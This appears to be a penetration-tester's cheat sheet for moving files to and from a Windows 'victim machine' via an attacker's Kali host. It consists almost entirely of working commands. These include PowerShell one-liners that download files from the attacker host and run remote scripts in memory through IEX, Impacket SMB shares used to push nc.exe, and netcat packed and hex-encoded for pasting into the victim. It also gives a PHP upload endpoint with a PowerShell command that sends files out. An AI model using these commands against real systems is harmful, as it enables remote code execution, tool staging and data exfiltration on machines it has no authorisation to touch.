- PowerShell one-liner download
powershell.exe -c "(New-Object System.Net.WebClient).DownloadFile('http://<KALI IP>/<FILE>', '<FILE>')"
iwr -uri http://<KALI IP>/<FILE> -Outfile <FILE>
- Run a powershell script without downloading it
powershell.exe IEX (New-Object System.Net.WebClient).DownloadString('http://<KALI IP>/<SCRIPT>.ps1')
Uploading Files with SMB
- Start an smb server on kali
impacket-smbserver <share name> <forder>#ex. impacket-smbserver robogroot .
impacket-smbserver <share name> <forder>
#ex. impacket-smbserver robogroot .
- Mount Share on windows
net use * \\<KALI IP>\<SHARE NAME>#ex. net use * \\192.168.1.5\robogroot
net use * \\<KALI IP>\<SHARE NAME>
#ex. net use * \\192.168.1.5\robogroot
- Copy files to windows
copy Z:\<file>#ex. copy Z:\nc.exe
copy Z:\<file>
#ex. copy Z:\nc.exe
Windows Downloads with exe2hex and PowerShell
- Inside Kali run :
upx -9 nc.exe
exe2hex -x nc.exe -p nc.cmd
Paste the output of nc.cmd inside windows victim machine
Windows Uploads Using Powershell
- Step 1 : Create upload.php inside /var/www/html
<?php $uploaddir = '/var/www/uploads/';
$uploadfile = $uploaddir . $_FILES['file']['name'];
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile) ?>
sudo mkdir /var/www/uploads
sudo chown www-data: /var/www/uploads
sudo systemctl restart apache2
- Step 2: Post the file from Windows
powershell -c "(New-Object System.Net.WebClient).UploadFile('http://<KALI IP>/upload.php', 'FILE')"